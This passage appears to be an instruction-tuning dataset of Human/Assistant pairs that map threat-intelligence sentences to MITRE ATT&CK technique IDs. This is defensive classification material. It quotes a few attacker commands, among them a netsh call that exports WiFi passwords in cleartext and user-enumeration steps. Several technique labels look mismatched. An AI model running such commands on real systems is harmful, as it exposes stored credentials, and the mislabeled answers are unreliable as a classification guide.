and running this local_update js file was to export all local host’s WiFi profiles (settings and passwords) to %APPDATA%\.xml with a command line call: cmd.exe /c netsh wlan export profile key=clear folder=""%APPDATA%"" They then gather more network information with a call to ipconfig and arp -a### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Unix shells to execute various commands or payloads.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SoreFang has the ability to list directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can use Native API including GetProcAddress and ShellExecuteW.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TSCookie has the ability to inject code into the svchost.exe, iexplorer.exe, explorer.exe, and default browser processes.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leveraging data from Kaspersky Security Network, we identified two other similar exploit chains used by BlackOasis in June 2015 which were zero days at the time.  Those include CVE-2015-5119 and CVE-2016-0984, which were patched in July 2015 and February 2016 respectively.  These exploit chains also delivered FinSpy installation packages### Assistant: T1068: Exploitation for Privilege Escalation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can execute WMI queries to gather information.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows Dynamic Data Exchange or Component Object Model.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dok gives all users execute permissions for the application using the command chmot +x /Users/Shared/AppStore.app.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fysbis can perform keylogging.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 has exfiltrated stolen data to the MEGA file sharing site.### Assistant: T1567: Exfiltration Over Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy2 was eventually seen downloading more crimeware plugins – a custom spam plugin and a banking information stealer custom plugin### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KGH_SPY can perform keylogging by polling the GetAsyncKeyState function.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may search social media for information about victims that can be used during targeting.### Assistant: T1593: Search Open Websites/Domains" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create a new process with a different token to escalate privileges and bypass access controls.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kivars has the ability to list drives on the infected host.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,11/1/18 sahro.bella7 trala.cosh2 Bishtr.cam47 Lobrek.chizh Cervot.woprov Table 5 Gathered C# Cannon samples As mentioned in our initial blog, the actor controlled email address acting as the C2 was sahro.bella7[at]post.cz, but all previous samples of Cannon used sym777.g[at]post.cz### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hydraq's backdoor also enables remote attackers to modify and delete subkeys.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, functions such as the Windows API CreateProcess or GNU fork will allow programs and scripts to start other processes.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has also used VPN tunnels established in legitimate software company infrastructure to gain access to internal networks of that software company's users.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAWKBALL has downloaded additional files from the C2.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed has the ability to use JavaScript to execute PowerShell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie collects the hostname of the victim machine.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackConfig has hidden malicious payloads in %USERPROFILE%\Adobe\Driver\dwg\ and mimicked the legitimate DHCP service binary.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The initial beacon packet for S-Type contains the operating system version and file system of the victim.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There is usually a delay between when an exploit is discovered and when it is made public.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RegDuke can hide data in images, including use of the Least Significant Bit .### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has the ability to overwrite scripts and delete itself if a sandbox environment is detected.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks.### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay has included a rootkit to evade defenses.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used PowerShell for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can remotely activate the victim’s webcam to capture content.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 named tasks \Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager in order to appear legitimate.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet can create registry keys to load driver files.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This ensures that only the intended recipient can read the encrypted data.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,URL parameter Sample data Description c= Victim->Administrator Hostname and username l= 192.168.1.100 Compromised system's IP address o= 5,1,1,32 Windows major and minor version, coupled with architecture (32 v### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used Win7Elevate to inject malicious code into explorer.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves can gather extended system information including the hostname, OS version number, platform, memory information, time elapsed since system startup, and CPU information.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Xbash can use mshta for executing scripts.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.### Assistant: T1534: Internal Spearphishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT can serve as a SOCKS proxy server.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used steganography to hide C2 communications in images.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The TAINTEDSCRIBE main executable has disguised itself as Microsoft’s Narrator.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT can also detect any removable drives connected to the system.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Although sensitive details may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.### Assistant: T1597: Search Closed Sources" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShimRat's loader has been packed with the compressed ShimRat core DLL and the legitimate DLL for it to hijack.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot obtains the IP address, location, and other relevant network information from the victim’s machine.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MESSAGETAP checks for the existence of two configuration files and attempts to read the files every 30 seconds.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stolen Pencil has a tool to add a Windows admin account in order to allow them to ensure continued access via RDP.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkComet can use HTTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used the PuTTY and Plink tools for lateral movement.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lokibot has reflectively loaded the decoded DLL into memory.### Assistant: T1620: Reflective Code Loading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,How the operating system locates libraries to be used by a program can also be intercepted.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.### Assistant: T1587: Develop Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The CARROTBAT malware family is a somewhat unique dropper and while it supports various types of decoy documents, and employs rudimentary command obfuscation, it should be made clear that it is not sophisticated### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The directory creation.  Downloading the Payloads The remote XSL script downloads twelve files from the C2 server that masquerade themselves as JPEG, GIF, and extensionless files### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT has collected the computer name and OS version from victim machines.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used ""whoami"" to identify the local user and their privileges.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has the ability to proxy network communications.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WannaCry utilizes wmic to delete shadow copies.### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Whitefly has obtained and used tools such as Mimikatz.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MSBuild.exe is a software build platform used by Visual Studio.### Assistant: T1127: Trusted Developer Utilities Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pisloader establishes persistence via a Registry Run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pisloader uses DNS as its C2 protocol.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,list /Users | grep -v '_' command can also be used to enumerate user accounts.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell can collect the local hostname, operating system details, CPU speed, and total physical memory.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This presentation by Christopher Glyer and Devon Kerr contains additional information on attacker use of WMI in past Mandiant investigations### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kessel has exfiltrated data via hexadecimal-encoded subdomain fields of DNS queries.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanHaiShu can gather the victim computer name and serial number.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Comnie executes VBS scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carberp has hooked several Windows API functions to steal credentials.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal adds itself to the Registry key HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run\ for persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBferry can detect the victim's file or folder list.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may make and impersonate tokens to escalate privileges and bypass access controls.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell hooks several API functions to spawn system threads.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has made registry modifications to alter its behavior upon execution.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's network domain that can be used during targeting.### Assistant: T1590: Gather Victim Network Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The following code snippet was used to decode strings within OopsIE:out = """" for e in obfuscated_string.split(""-""): out += chr(int(e)-1)When first run, this OopsIE variant runs a variety of checks to avoid running in an analysis environment, as discussed in the previous section### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The attackers orchestrate attacks using batch or PowerShell scripts that are executed, with the help of domain controllers, on any machine the DC can reach.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ragnar Locker encrypts files on the local machine and mapped drives prior to displaying a note demanding a ransom.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has executed the ipconfig /all command.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Digitally signed malware The entire bundle (VPN client and malware) was digitally signed with a valid code signing certificate issued by Symantec to AI Squared, a legitimate software company that develops accessibility software: Thumbprint: F340C0D841F9D99DBC289151C13391000366631C Serial number: 45 E4 7F 56 0B 01 B6 4E 68 39 5E 5D 79 2F 2E 09 Another Helminth sample, 1c23b3f11f933d98febfd5a92eb5c715, was signed with a different AI Squared code signing certificate: Thumbprint: 92B8C0872BACDC226B9CE4D783D5CCAD61C6158A Serial number:62 E0 44 E7 37 24 61 2D 79 4B 93 AF 97 46 13 48 This suggest that the attackers had got a hold of an Ai Squared signing key, potentially after compromising their network### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In Mac and Linux, netstat and lsof can be used to list current connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team have used previously acquired legitimate credentials prior to attacks.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has searched the Program Files directories for specific folders and has searched for strings related to its mutexes.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TYPEFRAME can upload and download files to the victim’s machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,On Linux, local users can also be enumerated through the use of the /etc/passwd file.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron contains a function to encrypt and store emails that it collects.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackTech has used spearphishing e-mails with malicious documents to deliver malware.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SLOTHFULMEDIA has used HTTP and HTTPS for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 used the Get-ManagementRoleAssignment PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Download & execute Startup (with persistence) Collection of system information (OS, version, installed location, etc.) Self-update Uninstall This project was created by a user called zettabithf which is linked to a user with the same name in Hack Forums### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has a command to launch a keylogger and capture keystrokes on the victim’s machine.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If Shamoon cannot access shares using current privileges, it attempts access using hard coded, domain-specific credentials gathered earlier in the intrusion.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has deployed a bootkit along with Downdelph to ensure its persistence on the victim.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kasidet has the ability to obtain a victim's system name and operating system version.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ramsay can conduct an initial scan for Microsoft Word documents on the local system, removable media, and connected network drives, before tagging and collecting them.### Assistant: T1119: Automated Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BabyShark has the ability to decode downloaded files prior to execution.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,VaporRage has the ability to check for the presence of a specific DLL and terminate if it is not found.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook was signed with valid Certum certificates.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHARPSTATS has the ability to identify the username on the compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Within the framework, shims are created to act as a buffer between the program and the Windows OS.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Based on dynamic and static analysis of the malware sample associated with the supservermgr[.]com domain however, we were able to determine several unique artifacts which allowed us to expand our dataset and discover additional findings### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar uploads files from a specified directory to the C2 server.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The networked device that made the ARP request will then use as well as store that information in its ARP cache.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may compromise access to third-party web services that can be used during targeting.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may create or edit shortcuts to run a program during system boot or user login.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dok persists via a plist login item.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With authenticated access there are several tools that can be used to find permissions groups.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs can remove itself from a system.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TA505 has used stolen domain admin accounts to compromise additional hosts.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Indrik Spider used wmic.exe to add a new user to the system.### Assistant: T1136: Create Account" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.### Assistant: T1591: Gather Victim Org Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HAFNIUM has stolen copies of the Active Directory database .### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JPIN can obtain the permissions of the victim user.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The unique strings mainly consist of “Mobile/BADDAD“, “Mobile/7B405” and “E9BC3BD76216AFA560BFB5ACAF5731A3”### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It uses the legitimate Naver email platform in order to communicate with the attackers via email### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several tools used by Suckfly have been command-line driven.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SDBbot has the ability to identify the OS version, country code, and computer name.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Various implementations of CHOPSTICK communicate with C2 over SMTP and POP3.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has the ability to extract credentials from configuration or support files.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some strings in HOMEFRY are obfuscated with XOR x56.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about victims may also be exposed to adversaries via online or other accessible data sets or Search Victim-Owned Websites.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SQLRat has created scheduled tasks in %appdata%\Roaming\Microsoft\Templates\.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CopyKittens has used Metasploit and Empire for post-exploitation activities.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBferry can execute rundll32.exe in memory to avoid detection.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OceanSalt can create a reverse shell on the infected endpoint using cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The starred commands are undocumented commands### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Threat Group-3390 has used net user to conduct internal discovery of systems.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dridex has relied upon users clicking on a malicious attachment delivered through spearphishing.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gazer obtains the current user's security identifier.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operators deploying Netwalker have used psexec and certutil to retrieve the Netwalker payload.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GOLD SOUTHFIELD has executed base64 encoded PowerShell scripts on compromised hosts.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has used an IRC bot for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can steal access tokens from exiting processes.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can inject its code into a trusted process via the APC queue.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TRINITY malware used by FIN6 identifies payment card track data on the victim and then copies it to a local file in a subdirectory of C:\Windows\.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,JavaScript is a platform-independent scripting language commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike can use known credentials to run commands and spawn processes as a local user account.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stealth Falcon malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It mimics the icon Finder usually applies to JPEG or text files to increase the likelihood the recipient will double-click the file### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may gather information about the victim's host firmware that can be used during targeting.### Assistant: T1592: Gather Victim Host Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Phishing for information is different from Phishing in that the objective is gathering data from the victim rather than executing malicious code.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Get Directory Information The malware gets information for the provided directory address using the following WINAPI calls:### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba can enumerate files by using a variety of functions.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Denis performed process hollowing through the API calls CreateRemoteThread, ResumeThread, and Wow64SetThreadContext.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 3 Password handover form displayed after credential theft The infrastructure used in these credential harvesting attacks used the domain 0utl00k[.]net, which at the time of the attacks resolved to 107.175.150[.]113 and 195.154.41[.]150### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot establishes persistence in the Startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GuLoader can delete its executable from the AppData\Local\Temp directory on the compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ke3chang uses command-line interaction to search files and directories.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ICMP communication between hosts is one example.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has encoded its C2 traffic with Base64.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves can communicate to its C2 over HTTP and HTTPS if directed.### Assistant: T1071: Application Layer 